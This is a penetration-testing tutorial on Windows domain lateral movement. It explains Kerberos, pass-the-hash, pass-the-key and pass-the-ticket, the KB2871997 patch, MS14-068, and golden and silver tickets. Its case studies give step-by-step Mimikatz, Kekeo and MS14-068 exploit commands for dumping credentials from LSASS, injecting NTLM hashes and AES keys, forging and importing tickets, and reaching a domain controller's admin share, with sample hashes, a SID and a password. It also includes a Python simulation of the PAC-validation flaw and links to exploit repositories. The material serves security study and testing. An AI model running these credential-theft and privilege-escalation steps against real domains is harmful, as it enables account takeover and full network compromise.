Abstract: This article delineates the operational workflow of the Kerberos protocol within a domain environment, including the process by which a client obtains a Ticket-Granting Ticket (TGT) and its significance in intranet security. It critically examines three lateral movement techniques—Pass the Hash (PTH), Pass the Ticket (PTT), and Pass the Key (PTK)—and evaluates the ramifications of NTLM and LM Hash authentication on Windows systems. The discussion extends to the security patch KB2871997, designed to mitigate PTH attacks. Through case studies, the utilisation of the Mimikatz tool for credential extraction and injection is demonstrated, alongside an analysis of the MS14-068 vulnerability and the concepts of Golden and Silver Tickets. The practical application of the Ladon intranet penetration testing framework for information gathering and lateral movement is also considered.
The Kerberos Protocol Workflow
The Kerberos protocol operates within a domain according to the following simplified procedure:
- AS exchange. The client derives a long-term key from the user's password (for RC4-HMAC this key is simply the user's NT hash; for AES it is a PBKDF2-derived key salted with the realm and user name) and uses it to encrypt a timestamp as pre-authentication data. The Key Distribution Centre (KDC), which runs on the domain controller, decrypts the timestamp with its own copy of the user's key; if that succeeds, the user is authenticated and the KDC returns a Ticket-Granting Ticket (TGT) together with a session key. The TGT is encrypted with the key of the krbtgt account, so only the KDC can read or verify it; to the client it is an opaque blob.
- TGS exchange. The client presents the TGT, plus an authenticator encrypted with the session key, to the KDC to request a service ticket (TGS ticket) for a given service. The KDC decrypts the TGT with the krbtgt key, checks it, and issues a service ticket encrypted with the target service account's key (for RC4, that account's NTLM hash). The client forwards the ticket to the service, which decrypts it with its own key and never has to contact the KDC.
Two consequences drive the attacks below: whoever holds a user's key can complete the AS exchange without knowing the password, and whoever holds the krbtgt key or a service account's key can mint tickets that the KDC or the service will accept.
The following definitions distinguish the three credential transfer techniques:
- PTH (Pass the Hash): authenticating with the LM or NTLM hash of a password instead of the password itself.
- PTT (Pass the Ticket): authenticating with a Kerberos ticket (typically a TGT) injected into the current logon session.
- PTK (Pass the Key): authenticating with the user's Kerberos AES256 key (listed among the "ekeys"; obtainable with the sekurlsa::ekeys command in Mimikatz).
On Authentication Hashes:
Windows stores two kinds of password hash: LM Hash and NTLM Hash. The LM hash is weak (case-insensitive, computed over two 7-character halves) and is no longer stored by default on client systems from Windows Vista and on server systems from Windows Server 2008; on those systems only the NTLM hash (the NT hash) is used for authentication. The NT hash is an unsalted MD4 of the UTF-16 password, so the same password produces the same hash on every machine and in every domain; that is what makes a shared local administrator password so dangerous (Case Study 1).
A ticket can be thought of as the cookie a website sets after login: a credential cached on the client that is presented on later connections instead of the password, and that stays valid until it expires. PTH and PTK both work by replacing the key material of a logon session (Mimikatz's sekurlsa::pth does this for either an NT hash or an AES key), after which the normal authentication flow proceeds; PTT instead injects a ready-made Kerberos ticket and therefore only ever works over Kerberos.
PTH Mechanism:
PTH is a classic intranet attack. Its principle is that the LM/NTLM hash is itself the authentication secret: the NTLM challenge-response is computed from the hash, and for Kerberos RC4-HMAC the NT hash is the encryption key, so an attacker who obtains the hash can authenticate to a host or service remotely without ever learning the plaintext password. Acquiring the hash is sufficient; cracking it is not required.
Details depend on the target. If NTLM authentication is disabled, a tool that speaks only NTLM (PsExec driven with a hash) cannot connect, but Mimikatz still can: sekurlsa::pth loads the NT hash as the RC4 Kerberos key of a new logon session, so the subsequent connection authenticates over Kerberos instead ("overpass-the-hash"). Mimikatz can substitute an AES key into the logon session in the same way, so that an AES256 key replaces the NT hash (a PTK attack), but only on Windows 8.1/2012 R2, or on Windows 7/2008 R2/8/2012 once KB2871997 is installed.
Summary: Impact of the KB2871997 Patch (run systeminfo and look for the KB in the hotfix list to confirm it is installed)
- PTH: On unpatched systems any local administrator's hash can be used to connect. The usual claim is that after the patch only the built-in Administrator account (RID 500) still works. As the FreeBuf article below shows, that restriction on the other local accounts comes from UAC remote token filtering (the LocalAccountTokenFilterPolicy registry value), which already applied before the patch, and domain accounts are not affected at all: a valid domain account hash still works after KB2871997.
- PTK: With the patch installed (or natively on 8.1/2012 R2) Mimikatz can replace the AES256 key of a logon session, so any user's AES key can be used to connect.
- Refer to: Does KB2871997 truly defend against PTH attacks? - FreeBuf Cybersecurity Industry Portal
The Nature of PTT Attacks:
PTT does not use NTLM at all; it is an attack on the Kerberos side. Three common variants are covered here: the MS14-068 exploit, the Golden Ticket and the Silver Ticket. In each case a forged but valid-looking ticket is injected into the current session's memory and then used to connect.
- MS14-068 (CVE-2014-6324): an elevation-of-privilege vulnerability in the KDC's validation of the PAC, fixed by Microsoft's patch KB3011780. It is dangerous because any ordinary domain user can obtain a ticket that makes them a domain administrator.
- Golden Ticket: a TGT forged with the krbtgt account's hash. Because the KDC validates a TGT purely by decrypting it with that key, the forged TGT is accepted for any user name and any group membership. It is a persistence technique: it requires domain-admin access once, to dump the krbtgt hash, and stays usable until the krbtgt password has been changed twice.
- Silver Ticket: a service ticket forged with a service account's hash (for example the computer account behind cifs/ on a file server). The service decrypts it with its own key and never consults the KDC, so it is quieter than a golden ticket, but it only grants access to that one service. Also a persistence technique.
Technique Summaries
- Domain Lateral Movement via PTH Transfer - Mimikatz
- Domain Lateral Movement via PTK Transfer - Mimikatz
- Domain Lateral Movement via PTT Transfer - MS14-068 & Kekeo & Local Tickets
- Ladon Intranet Penetration Framework (Chinese-developed) Testing - Information Gathering, Connectivity, etc.
Case Study 1: Domain Lateral Movement via PTH Transfer - Mimikatz
Pass the Hash works from a captured password hash (typically the NTLM hash) of an account. In a domain, where users mostly log on with domain accounts, many machines were installed from the same image and therefore share an identical local administrator password. If that local administrator password is uniform, the hash dumped from one host lets the attacker authenticate to every other host on the intranet, because the NT hash is unsalted and thus identical on every machine. The decisive advantage for the attacker is that cracking the hash back to the plaintext, which can be slow or impossible, is unnecessary.
Mimikatz serves as the instrumental tool for PTH, functioning not only as a credential harvester and plaintext password extractor but also as an attack platform.
PTH NTLM Transfer Commands:
For unpatched workgroup and domain connections:
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7    (domain account; assumes the domain Administrator's NT hash, e.g. dumped on the domain controller, is already known)
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad458a5695dc997aa02d455c    (/domain:workgroup designates a local, non-domain account)
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad217334fe7
Target example: \OWA2010CN-God.god.org (Domain Controller)
Experimental Demonstration:
Run Mimikatz from an elevated console on the 2008 R2 x64 web server and enter the following sequence:
privilege::debug
sekurlsa::logonpasswords    (dumps the credentials of every logon session, including plaintext passwords where they are still cached, such as WDigest on an unpatched 2008 R2, and the NTLM hash needed below)
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7    (Mimikatz spawns a new command prompt whose logon session carries the injected hash)
In the newly spawned window, execute: dir \\192.168.3.21\c$    (if the IP address does not work, use the target's hostname: Kerberos needs a host-based service principal name)
Case Study 2: Domain Lateral Movement via PTK Transfer - Mimikatz
This method uses the user's Kerberos AES256 key instead of the NT hash. Mimikatz injects the key into a new logon session exactly as for PTH; the difference is that the resulting Kerberos exchange uses AES rather than RC4, so it does not stand out the way RC4 (encryption type 0x17) tickets in an AES-capable domain do in the 4768/4769 events, a well-known overpass-the-hash indicator.
Commands for patched workgroup and domain connections:
sekurlsa::ekeys    # lists the Kerberos keys of every logon session; copy the aes256_hmac value
sekurlsa::pth /user:mary /domain:god /aes256:d7c110753a2f7f240e5b2701dc1d16a16e40af3c5cdf814781c4b
Crucially, the constraint is on the host where Mimikatz runs: it can only substitute an AES key into a logon session on Windows 8.1/2012 R2, or on 7/2008 R2/8/2012 with KB2871997 installed. On an older, unpatched host the /aes256 option does not work and you must fall back to the NT hash. For a non-administrator account such as mary, what the new session can reach is decided by the target's ACLs, not by the patch.
Case Study 3: Domain Lateral Movement via PTT Transfer - MS14-068 & Kekeo & Local Tickets
First Method: Exploiting the MS14-068 Vulnerability
This technique lets an ordinary domain user obtain a ticket carrying domain administrator group membership, and with it access to the domain controller.
Procedure for MS14-068 (run from a command prompt on a domain-joined host as the low-privilege user):
- Ascertain the current user's Security Identifier (SID):
whoami /user
- Credential management in Mimikatz:
mimikatz # kerberos::purge    // purges all Kerberos tickets on the current machine; existing tickets for the domain can interfere with the forged one
mimikatz # kerberos::list    // lists the tickets currently cached
mimikatz # kerberos::ptc <ticket_filename>    // injects a ticket file in ccache format into memory
- Generate the forged ticket with the MS14-068 exploit:
ms14-068.exe -u <DomainMember>@<domain> -s <sid> -d <domain_controller_address> -p <domain_member_password>
Example:
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-21573346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
- Inject the forged ticket into memory:
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
- Verify the credential cache:
klist    (lists the cached tickets; klist purge deletes them)
- Use the access:
dir \\192.168.3.21\c$    (or net use; connect by hostname rather than IP, because a bare IP makes Windows fall back to NTLM, which would authenticate as the real low-privilege user instead of with the injected ticket)
The principle: the exploit first requests a TGT without a PAC, then sends a TGS request that carries a self-made PAC listing domain-admin group memberships. Before KB3011780 the KDC verified the PAC's signatures using whatever checksum type the PAC itself declared, including unkeyed ones that the attacker can compute, so it issued a new TGT containing the forged PAC. Importing that ticket with Mimikatz gives a connection without any password being used at connection time.
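The PAC validation flaw just described, as an added example in Python, written for this page and not taken from the exploit, from pykek or from Microsoft's code. The PAC is reduced to a dict with a server and a KDC signature (a real PAC is an MS-PAC binary structure and the KDC signature actually covers the server signature); the checksum type numbers are the real ones from RFC 3961 (7 = RSA-MD5, unkeyed; 16 = HMAC-SHA1-96-AES256, keyed). The krbtgt key is constructed, the user and RID 1124 are the article's, and the group RIDs are the standard ones (513 Domain Users, 512 Domain Admins, 518 Schema Admins, 519 Enterprise Admins, 520 Group Policy Creator Owners).

```python
# MS14-068 in miniature: the KDC's PAC signature check before and after KB3011780.
# Added example; not the exploit and not Microsoft's code. The PAC is simplified
# to a dict; checksum type numbers are real (RFC 3961): 7 unkeyed MD5, 16 keyed.
import hashlib, hmac, json

RSA_MD5 = 7
HMAC_SHA1_96_AES256 = 16

def checksum(ctype: int, key, data: bytes) -> bytes:
    if ctype == RSA_MD5:                      # anyone can compute this, no key involved
        return hashlib.md5(data).digest()
    if ctype == HMAC_SHA1_96_AES256:          # requires the signing key
        return hmac.new(key, data, hashlib.sha1).digest()[:12]
    raise ValueError(f"unsupported checksum type {ctype}")

def build_pac(logon_info: dict, ctype: int, key=None) -> dict:
    # PAC with server and KDC signatures of the requested type. A legitimate KDC
    # uses a keyed type with the krbtgt key; the exploit picks RSA-MD5 so that no
    # key is needed (the forged PAC is sent in a TGS-REQ addressed to krbtgt).
    data = json.dumps(logon_info, sort_keys=True).encode()
    sig = {"type": ctype, "value": checksum(ctype, key, data)}
    return {"logon_info": logon_info, "server_sig": dict(sig), "kdc_sig": dict(sig)}

def kdc_validate_pac(pac: dict, krbtgt_key: bytes, patched: bool) -> list:
    # Returns the group RIDs the KDC will copy into the ticket it issues.
    # patched=False reproduces the flaw: the checksum *type* is read from the PAC
    # itself, so an unkeyed type is "verified" by recomputing an unkeyed hash.
    data = json.dumps(pac["logon_info"], sort_keys=True).encode()
    for name in ("server_sig", "kdc_sig"):
        sig = pac[name]
        if patched and sig["type"] != HMAC_SHA1_96_AES256:
            raise PermissionError(f"{name}: PAC signatures must use a keyed checksum")
        expected = checksum(sig["type"], krbtgt_key, data)
        if not hmac.compare_digest(expected, sig["value"]):
            raise PermissionError(f"{name}: signature mismatch")
    return pac["logon_info"]["group_ids"]

def demo() -> dict:
    krbtgt_key = hashlib.sha256(b"constructed krbtgt key").digest()
    plain_user = {"user": "mary", "user_rid": 1124, "group_ids": [513]}
    admin = dict(plain_user, group_ids=[513, 512, 518, 519, 520])   # forged memberships
    legit = build_pac(plain_user, HMAC_SHA1_96_AES256, krbtgt_key)  # what the KDC issues
    forged = build_pac(admin, RSA_MD5)                               # attacker, no key at all
    out = {"legit": kdc_validate_pac(legit, krbtgt_key, patched=True),
           "forged_unpatched": kdc_validate_pac(forged, krbtgt_key, patched=False)}
    try:
        kdc_validate_pac(forged, krbtgt_key, patched=True)
        out["forged_patched"] = "accepted"
    except PermissionError:
        out["forged_patched"] = "rejected"
    # Guessing a keyed signature without the key fails on both versions.
    guess = build_pac(admin, HMAC_SHA1_96_AES256, b"attacker guess")
    try:
        kdc_validate_pac(guess, krbtgt_key, patched=False)
        out["keyed_guess"] = "accepted"
    except PermissionError:
        out["keyed_guess"] = "rejected"
    return out
```

The unpatched check is not skipping verification; it verifies exactly what the attacker asked it to verify. The fix is to bind the accepted checksum type to the key, which is what the patched branch does.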
Second Method: Utilising the Kekeo Tool
Kekeo performs a genuine AS exchange with the user's NT hash as the RC4 key (overpass-the-hash) and writes the resulting TGT to a .kirbi file, which is then injected. No vulnerability is involved, only the hash.
- Generate the ticket:
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a5dc997aa02d45c"
- Import the ticket:
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
- Verify the credential cache:
klist
- Establish the connection:
dir \\192.168.3.21\c$
Third Method: Reusing Local Tickets (Requires Local Administrator Privileges)
This method harvests the valid tickets already cached on the host, the "cookies" of the earlier analogy, and reuses them. Reading them out of LSASS is what requires local administrator rights. Mimikatz exports every cached ticket to a .kirbi file, and one of those files is then imported into the current session:
sekurlsa::tickets /export
kerberos::ptt xxxxxxxxx.xxx.kirbi    (loads the exported ticket; then test it with a dir against the target)
An exported TGT stays usable only until it expires, 10 hours by default from issue, unless it is renewed.
Summary: Of the three PTT variants, only ticket harvesting from LSASS needs local administrator rights; MS14-068 needs nothing beyond a valid domain account, and Kekeo needs that account's hash. Connect using the hostname rather than the IP address, because Kerberos tickets are issued for a service principal name and a bare IP makes Windows fall back to NTLM, which does not use the injected ticket. The technique rests on a known vulnerability, a dedicated tool, or the harvesting of locally cached tickets.
Case Study 4: The Ladon Intranet Penetration Framework - Testing and Validation
This section covers the practical application of Ladon for Information Gathering, Protocol Scanning, Vulnerability Probing, and Credential Passing Attacks.
Ladon functions as a large-scale intranet penetration scanner, often used in conjunction with Cobalt Strike. Ladon version 8.9 incorporates 120 built-in modules for tasks including information gathering, live host detection, port scanning, service identification, password spraying, vulnerability detection, and vulnerability exploitation. Vulnerability detection covers MS17-010 (EternalBlue), SMBGhost, WebLogic, ActiveMQ, Tomcat, and Struts2. Password spraying targets databases (MySQL, Oracle, MSSQL), remote access protocols (FTP, SSH for Linux, VNC), and Windows services (IPC, WMI, SMB, NetBIOS, LDAP, SmbHash, WmiHash, WinRM). Remote command execution supports several methods (smbexec, wmiexec, psexec, atexec, sshexec) and shells (e.g. sshell, Webshell). Version X-4.0 and later are the ones considered here.
Resources:
- Ladon Repository: https://github.com/k8gege/Ladon
- Kekeo Releases: https://github.com/gentilkiwi/kekeo/releases
- MS14-068 Exploit: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068